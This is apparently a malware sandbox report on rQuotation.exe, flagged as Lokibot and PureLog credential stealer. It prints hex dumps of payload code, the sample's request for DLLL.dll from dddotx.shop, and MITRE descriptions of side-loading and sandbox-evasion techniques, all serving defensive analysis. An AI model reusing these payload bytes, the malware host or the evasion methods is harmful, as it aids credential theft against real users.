2024-12-16 12:15:04 UTC	1369	IN	Data Raw: 00 00 8b c2 2b c7 90 3a 08 74 4a 4f 40 85 ff 75 f6 83 86 1c 04 00 00 ff 75 1d 8b 86 10 04 00 00 89 86 18 04 00 00 40 c7 86 1c 04 00 00 08 00 00 00 89 86 10 04 00 00 8b 86 18 04 00 00 d0 20 8b 86 10 04 00 00 8a 0a 5f 88 08 ff 86 10 04 00 00 5e 5d c2 08 00 85 ff 74 b8 83 c9 ff 01 8e 1c 04 00 00 8d 69 09 75 19 8b 86 10 04 00 00 89 86 18 04 00 00 40 89 ae 1c 04 00 00 89 86 10 04 00 00 8b 86 18 04 00 00 8a 10 02 d2 fe c2 88 10 01 8e 1c 04 00 00 75 19 8b 86 10 04 00 00 89 86 18 04 00 00 40 89 ae 1c 04 00 00 89 86 10 04 00 00 8b 86 18 04 00 00 8a 10 02 d2 fe c2 88 10 01 8e 1c 04 00 00 75 19 8b 86 10 04 00 00 89 86 18 04 00 00 40 89 ae 1c 04 00 00 89 86 10 04 00 00 8b 86 18 04 00 00 8a 08 02 c9 fe c1 8b d7 23 d5 88 08 52 8b ce e8 d9 fc ff ff 8b c7 83 e0 04 50 8b Data Ascii: +:tJO@uu@ _^]tiu@u@u@#RP
2024-12-16 12:15:04 UTC	1369	IN	Data Raw: 00 40 89 ae 1c 04 00 00 89 86 10 04 00 00 8b 86 18 04 00 00 d0 20 01 be 1c 04 00 00 75 19 8b 86 10 04 00 00 89 86 18 04 00 00 40 89 ae 1c 04 00 00 89 86 10 04 00 00 8b 86 18 04 00 00 d0 20 8b 54 24 18 52 8b ce e8 d4 f8 ff ff 5f 5e 5d 5b c2 08 00 8b 44 24 04 8d 90 00 68 01 00 3b 91 04 04 00 00 76 19 8b 89 0c 04 00 00 3b c1 76 05 2b c1 c2 04 00 2b c1 05 00 68 01 00 c2 04 00 33 c0 c2 04 00 83 ec 10 53 55 8b 6c 24 20 56 33 db 8b f1 57 89 5c 24 10 89 5c 24 18 39 ae 08 04 00 00 0f 83 a3 00 00 00 eb 0b 8d a4 24 00 00 00 00 8d 64 24 00 8b 86 04 04 00 00 8d 88 00 68 01 00 3b c8 76 17 8b 8e 0c 04 00 00 3b c1 76 04 2b c1 eb 0b 2b c1 05 00 68 01 00 eb 02 33 c0 8b 8e 08 04 00 00 0f b6 11 0f b6 49 01 8b 54 96 04 8b 0c 8a 8b 3e 89 0c 87 8b 86 08 04 00 00 0f b6 10 0f b6 Data Ascii: @ u@ T$R_^][D$h;v;v++h3SUl$ V3W\$\$9$d$h;v;v++h3IT>
2024-12-16 12:15:04 UTC	1369	IN	Data Raw: 00 8b 44 24 38 3d 00 05 00 00 7c 09 83 ff 02 0f 84 09 03 00 00 3d 00 7d 00 00 7c 09 83 ff 03 0f 84 f9 02 00 00 8b 5c 24 58 8b 44 24 54 8b 96 14 04 00 00 2b c3 89 44 24 20 48 50 8d 4b 01 51 42 52 8d 44 24 4c 50 8b ce e8 dc fa ff ff 8b 4c 24 28 39 4c 24 40 8d 43 01 89 44 24 1c 55 7c 39 8b d1 52 8b ce e8 44 f7 ff ff 8b 4c 24 40 89 44 24 24 8b 44 24 44 50 51 8b ce e8 2f f7 ff ff 8b 4c 24 24 2b c8 03 c9 b8 39 8e e3 38 f7 e9 d1 fa 8b c2 c1 e8 1f 03 c2 eb 30 8b 4c 24 2c 51 8b ce e8 09 f7 ff ff 8b 54 24 44 8b d8 8b 44 24 40 52 50 8b ce e8 f6 f6 ff ff 2b d8 8b c3 8b 5c 24 58 99 83 e2 03 03 c2 c1 f8 02 03 44 24 44 3b e8 7d 08 c7 44 24 14 01 00 00 00 85 ff 76 38 39 6c 24 44 7c 30 8b 4c 24 28 55 51 8b ce e8 be f6 ff ff 8b 54 24 44 8b d8 8b 44 24 40 52 50 8b ce e8 ab Data Ascii: D$8=\|=}\|\$XD$T+D$ HPKQBRD$LPL$(9L$@CD$U\|9RDL$@D$$D$DPQ/L$$+980L$,QT$DD$@RP+\$XD$D;}D$v89l$D\|0L$(UQT$DD$@RP
2024-12-16 12:15:04 UTC	1369	IN	Data Raw: 85 ff 74 03 47 eb 0f 8b 86 14 04 00 00 53 50 8b ce e8 b6 ef ff ff ff 86 14 04 00 00 85 ff 0f 84 eb 00 00 00 3b 7c 24 3c 0f 85 e1 00 00 00 8b 54 24 54 8b cf 2b cb 8d 04 0a 3b c7 76 02 8b c7 50 8b 44 24 14 8b eb 2b ef 55 50 8d 4c 24 3c 51 8b ce 89 6c 24 24 e8 76 f5 ff ff 39 7c 24 34 72 34 8b 54 24 30 57 52 8b ce e8 e7 f1 ff ff 8b e8 8b 44 24 38 57 50 8b ce e8 d8 f1 ff ff 3b c5 8b 6c 24 14 7e 10 8b 4c 24 30 8b 54 24 34 89 4c 24 38 89 54 24 3c 8b 44 24 10 57 55 50 8b ce e8 d1 ee ff ff 8b 4c 24 38 57 51 8b ce 8b e8 e8 a3 f1 ff ff 3b c5 7d 3a 8b 44 24 38 3b 86 24 04 00 00 75 09 83 be 28 04 00 00 00 74 18 3d 00 05 00 00 7c 05 83 ff 02 74 19 3d 00 7d 00 00 7c 05 83 ff 03 74 0d 57 50 8b ce e8 eb f1 ff ff 33 ff eb 20 8b 6c 24 10 05 00 00 00 00 8b d3 2b d7 52 55 8b Data Ascii: tGSP;\|$<T$T+;vPD$+UPL$<Ql$$v9\|$4r4T$0WRD$8WP;l$~L$0T$4L$8T$<D$WUPL$8WQ;}:D$8;$u(t=\|t=}\|tWP3 l$+RU
2024-12-16 12:15:04 UTC	1369	IN	Data Raw: bb 01 00 00 00 75 63 b9 01 00 00 00 00 d2 75 12 83 6c 24 04 01 0f 82 24 01 00 00 8a 16 46 00 d2 fe c2 11 c9 0f 82 15 01 00 00 00 d2 75 12 83 6c 24 04 01 0f 82 06 01 00 00 8a 16 46 00 d2 fe c2 72 ca 51 8b 4c 24 3c 2b 4c 24 04 39 cd 59 0f 87 eb 00 00 00 29 0c 24 0f 82 e2 00 00 00 56 89 fe 29 ee f3 a4 5e e9 79 fe ff ff 48 a9 00 00 00 ff 0f 85 c9 00 00 00 c1 e0 08 83 6c 24 04 01 0f 82 bb 00 00 00 8a 06 46 89 c5 b9 01 00 00 00 00 d2 75 12 83 6c 24 04 01 0f 82 a2 00 00 00 8a 16 46 00 d2 fe c2 11 c9 0f 82 93 00 00 00 00 d2 75 12 83 6c 24 04 01 0f 82 84 00 00 00 8a 16 46 00 d2 fe c2 72 ca 3d 00 7d 00 00 83 d9 ff 3d 00 05 00 00 83 d9 ff 3d 80 00 00 00 83 d1 00 3d 80 00 00 00 83 d1 00 51 8b 4c 24 3c 2b 4c 24 04 39 c8 59 77 4d 29 0c 24 72 48 56 89 fe 29 c6 f3 a4 5e Data Ascii: ucul$$Ful$FrQL$<+L$9Y)$V)^yHl$Ful$Ful$Fr=}===QL$<+L$9YwM)$rHV)^
2024-12-16 12:15:04 UTC	1369	IN	Data Raw: 66 ab 58 6a 72 5e 6a 6c 66 89 85 fa fe ff ff 8d bd 08 ff ff ff 58 6a 6d 66 89 85 fe fe ff ff 58 6a 6f 66 89 85 00 ff ff ff 58 6a 6e 66 89 85 02 ff ff ff 58 66 89 85 04 ff ff ff 33 c0 66 89 85 06 ff ff ff 6a 45 66 89 b5 fc fe ff ff ab ab ab 58 6a 41 66 89 85 16 ff ff ff 66 89 95 18 ff ff ff 5a 6a 50 58 6a 49 66 89 85 1c ff ff ff 58 6a 33 66 89 85 1e ff ff ff 58 6a 32 5f 6a 53 66 89 85 20 ff ff ff 33 c0 21 85 26 ff ff ff 21 85 2a ff ff ff 66 89 8d 14 ff ff ff 59 6a 5f 66 89 85 24 ff ff ff 58 66 89 85 34 ff ff ff 6a 33 58 66 89 85 36 ff ff ff 33 c0 66 89 bd 22 ff ff ff 66 89 bd 32 ff ff ff 66 89 bd 38 ff ff ff 8d bd 3c ff ff ff 66 89 85 3a ff ff ff 66 89 95 1a ff ff ff 66 89 9d 2e ff ff ff 66 89 8d 30 ff ff ff ab 6a 75 ab ab 58 6a 73 66 89 85 48 ff ff ff 58 Data Ascii: fXjr^jlfXjmfXjofXjnfXf3fjEfXjAffZjPXjIfXj3fXj2_jSf 3!&!*fYj_f$Xf4j3Xf63f"f2f8<f:ff.f0juXjsfHX
2024-12-16 12:15:04 UTC	1369	IN	Data Raw: 2d 83 7d 0c 00 66 8b 06 74 0e 66 3b 44 4d c8 75 0e 66 8b 44 4d 90 eb 13 66 3b 44 4d 90 74 07 41 3b cf 72 dd eb 08 66 8b 44 4d c8 66 89 06 83 c6 02 4a 75 c7 5f 5e 8b e5 5d c3 55 8b ec 8b 4d 10 85 c9 74 0e 8b 55 08 8a 02 42 3a 45 0c 74 07 49 75 f5 33 c0 5d c3 8d 42 ff 5d c3 55 8b ec 8b 4d 10 85 c9 74 1b 8b 45 0c 0f b7 d0 8b c2 c1 e2 10 57 8b 7d 08 0b c2 d1 e9 f3 ab 13 c9 66 f3 ab 5f 8b 45 08 5d c3 55 8b ec 8b 45 10 03 c0 50 ff 75 0c ff 75 08 e8 61 f7 ff ff 83 c4 0c 5d c3 55 8b ec 8b 45 08 66 8b 55 0c 0f b7 08 66 3b ca 74 17 66 85 c9 74 0b 83 c0 02 0f b7 08 66 3b ca 75 f0 66 39 10 74 02 33 c0 5d c3 55 8b ec 83 ec 20 33 c0 56 8b 75 0c 57 6a 08 59 8d 7d e0 f3 ab 53 8a 1e b0 01 0f be cb 8b d1 83 e1 07 c1 fa 03 d2 e0 08 44 15 e0 46 84 db 75 e6 83 7d 08 00 8b 35 Data Ascii: -}ftf;DMufDMf;DMtA;rfDMfJu_^]UMtUB:EtIu3]B]UMtEW}f_E]UEPuua]UEfUf;tftf;uf9t3]U 3VuWjY}SDFu}5
2024-12-16 12:15:04 UTC	1369	IN	Data Raw: 83 c4 0c 56 56 68 d1 07 41 d3 6a 09 e8 4a f9 ff ff 68 00 00 00 f0 6a 01 56 56 8d 4d f8 51 ff d0 85 c0 0f 84 84 00 00 00 8b 75 f8 6a 00 6a 00 68 f3 a6 b0 ed 6a 09 e8 20 f9 ff ff 8d 4d fc 51 6a 00 6a 00 68 03 80 00 00 56 ff d0 85 c0 74 51 6a 00 53 ff 75 08 ff 75 fc e8 7f fd ff ff 83 c4 10 85 c0 74 3c 8b 75 fc 6a 00 6a 00 68 fd db a8 fe 6a 09 e8 e4 f8 ff ff 6a 00 8d 4d f4 51 57 6a 02 56 ff d0 85 c0 74 19 ff 75 fc e8 16 fd ff ff 6a 00 ff 75 f8 e8 26 fd ff ff 83 c4 0c 8b c7 eb 0e 6a 00 ff 75 f8 e8 15 fd ff ff 59 59 33 c0 5f 5e 5b 8b e5 5d c3 55 8b ec 56 57 ff 75 0c 33 ff ff 75 08 e8 f2 fe ff ff 8b f0 59 59 85 f6 74 13 6a 10 56 e8 8e 01 00 00 56 8b f8 e8 42 f2 ff ff 83 c4 0c 8b c7 5f 5e 5d c3 55 8b ec 83 ec 0c 53 56 57 33 db be d1 07 41 d3 53 53 56 6a 09 e8 59 Data Ascii: VVhAjJhjVVMQujjhj MQjjhVtQjSuut<ujjhjjMQWjVtuju&juYY3_^[]UVWu3uYYtjVVB_^]USVW3ASSVjY

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49708	172.67.153.63	443	7704	C:\Users\user\Desktop\rQuotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 12:15:06 UTC	45	OUT	GET /DLLL.dll HTTP/1.1 Host: dddotx.shop
2024-12-16 12:15:07 UTC	552	IN	HTTP/1.1 403 Forbidden Date: Mon, 16 Dec 2024 12:15:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vrUfkhZHRhS0TV%2FAYhx84ulZmJvShe2x0RbiW3L2rSBKhmRW2Bcnlm%2FBMQEqtwQ1eQmu1AFFYk8r59dYcA3S%2FyltYhdh7UNYCd0I4xWtbQd3qP8L2XvcUamAZFpgqw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2e98d3ec9332e4-EWR
2024-12-16 12:15:07 UTC	817	IN	Data Raw: 31 31 63 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 11c9<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-12-16 12:15:07 UTC	1369	IN	Data Raw: 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f Data Ascii: /cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('coo
2024-12-16 12:15:07 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/c
2024-12-16 12:15:07 UTC	1006	IN	Data Raw: 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 Data Ascii: ="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Perfor
2024-12-16 12:15:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	07:15:01
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\rQuotation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rQuotation.exe"
Imagebase:	0x580000
File size:	130'560 bytes
MD5 hash:	DCA8BDEFE8237A48128806FF688AC05A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1402328648.0000000000582000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1453520487.0000000002AEA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1453841567.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1453841567.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Function 00D60838 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1453253740.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_rQuotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee7337541cf088347ec5a07e5aa196d7bf8518b47b6cb3c8758d3e5419cb98ac
Instruction ID: 45a330f6c6c447f03796fd61a54720ec20bdea28ebda6f04ad0d2e4bd72703ff
Opcode Fuzzy Hash: ee7337541cf088347ec5a07e5aa196d7bf8518b47b6cb3c8758d3e5419cb98ac
Instruction Fuzzy Hash: 4731A275E011089FCB18DFA9E954AEDBBF2FF89301F14902AE81AB7264DB305906CB54

Function 00D60848 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1453253740.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_rQuotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bf1195959c3eb60e0ce4f8ca7d030267e03ffc67c77aca1a823743bf3f56eab
Instruction ID: 827a0460a13ae4f5db52780147d6e085c5c478436bede7ae109f7a5325703baa
Opcode Fuzzy Hash: 0bf1195959c3eb60e0ce4f8ca7d030267e03ffc67c77aca1a823743bf3f56eab
Instruction Fuzzy Hash: E721A375E012089FCB48DFA9E954ADDBBF6FF89310F14902AE819B7364DB305902CB54

Function 00D60972 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1453253740.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_rQuotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10732bd72c0127a27fabaa12fb04e29dcf941ebb1507ea18532d2a4aa6267314
Instruction ID: 95d3043617f1ea22d39b7a4797147802b6509495afb6df49a94234e576f064a2
Opcode Fuzzy Hash: 10732bd72c0127a27fabaa12fb04e29dcf941ebb1507ea18532d2a4aa6267314
Instruction Fuzzy Hash: 89F09071E082488FDB558BB5E928BFDBF71AB8B341F04516ED146632A2DF6448019B62

Function 00D653F9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1453253740.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_rQuotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d54313e48dd891282acef6c72e0d50f32ab3fd7b8e6700d6c561d0c9e9beeab
Instruction ID: bd954b2ca96d64ecceb55766317f94f2779f3227eaef1a4fe87f07c767168f0b
Opcode Fuzzy Hash: 7d54313e48dd891282acef6c72e0d50f32ab3fd7b8e6700d6c561d0c9e9beeab
Instruction Fuzzy Hash: 3FB09234540619CBCB608B20DE987AA7A31AB01302F2880A5800E22260CB340A848F10

Non-executed Functions

Function 00D61228 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1453253740.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_rQuotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd62523f1d15198b196ea10aa72898958e48b7c2db9ba62b2688c7ff4dffcde7
Instruction ID: 188aa23c1d37477a095f17a529cfcc1178c398e539fad60403db77ce942ff237
Opcode Fuzzy Hash: dd62523f1d15198b196ea10aa72898958e48b7c2db9ba62b2688c7ff4dffcde7
Instruction Fuzzy Hash: 536110B4A002098FDB09EFBAE950B9ABBF2FFC8304F15D56AD0049B265DF745906DB50

Function 00D61238 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1453253740.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_rQuotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28cfe0a2d8b4e7d49da3f0f352eb50daee32ae3f6caf2b191287a5aa3557a06e
Instruction ID: d0e3670f7fec04afbed5ed2ae5c67f869d1d19f407004f15a89522985d1188cb
Opcode Fuzzy Hash: 28cfe0a2d8b4e7d49da3f0f352eb50daee32ae3f6caf2b191287a5aa3557a06e
Instruction Fuzzy Hash: 78610074A002098FDB05EFBAE950B9ABBF2FFC8304F15D56AD0049B265DF745906CB50

Function 00D614D8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1453253740.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_rQuotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c69efd28bf3b2556904d28a304efedb8ed690feb192dcd6594911181a956c36
Instruction ID: 3d0ad40cb85856950d0c2f02db5b69d9221a9b3dad940466217af70c796c9951
Opcode Fuzzy Hash: 1c69efd28bf3b2556904d28a304efedb8ed690feb192dcd6594911181a956c36
Instruction Fuzzy Hash: 16413D71D01A598BEB6CCF6BCD4079AFAF7AFC8201F18C1FA840DA6254DB704A858F10

Function 00D614C7 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1453253740.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_rQuotation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b44dd4c76e75a46ad43e46551522f51a11020218e1a5c1067a721138c78398
Instruction ID: 43751de6629659c31e6043384e8632c94879e5390a8548f737b8ff3a4a022e4c
Opcode Fuzzy Hash: 30b44dd4c76e75a46ad43e46551522f51a11020218e1a5c1067a721138c78398
Instruction Fuzzy Hash: E8414471E01A598BEB5CCF6B8D4079AFAF3AFC5301F18C1FA840DA6224DB3049868F10

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

